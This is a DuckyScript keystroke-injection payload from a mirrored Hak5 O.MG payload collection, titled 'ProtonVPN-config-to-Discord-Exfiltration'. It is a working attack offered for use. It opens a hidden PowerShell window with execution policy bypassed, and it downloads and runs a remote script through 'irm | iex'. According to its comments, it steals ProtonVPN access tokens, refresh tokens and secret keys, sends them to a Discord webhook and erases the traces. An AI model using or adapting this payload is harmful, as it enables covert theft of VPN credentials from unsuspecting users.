mirror of https://github.com/hak5/omg-payloads.git
44 lines
1.9 KiB
Plaintext
44 lines
1.9 KiB
Plaintext
REM ###################################################################
|
|
REM # |
|
|
REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
|
|
REM # Author : Aleff |
|
|
REM # Version : 1.0 |
|
|
REM # Category : Credentials, Exfiltration |
|
|
REM # Target : Windows 10-11 |
|
|
REM # |
|
|
REM ###################################################################
|
|
|
|
REM Title: ProtonVPN-config-to-Discord-Exfiltration
|
|
REM Author: Aleff
|
|
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
|
REM In the config file you can find a lot information about the user like:
|
|
REM - UserUid
|
|
REM - UserAccessToken
|
|
REM - UserRefreshToken
|
|
REM - UserAuthenticationPublicKey
|
|
REM - UserAuthenticationSecretKey
|
|
REM - UserAuthenticationCertificatePem
|
|
REM - UserCertificationServerPublicKey
|
|
REM - and so on...
|
|
REM Then it cleans up traces of what you have done after.
|
|
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
|
|
REM Version: 1.0
|
|
REM Category: Credentials, Exfiltration
|
|
REM Requirements: ProtonVPN user logged at least one time and internet connection
|
|
REM
|
|
|
|
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
|
DEFINE WEBHOOK example.com
|
|
|
|
DELAY 2000
|
|
GUI r
|
|
DELAY 250
|
|
DELETE
|
|
STRING powershell -w h -ep bypass $discord='
|
|
STRING WEBHOOK
|
|
|
|
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
|
|
DEFINE PAYLOAD example.com
|
|
STRING ';irm PAYLOAD | iex
|
|
ENTER
|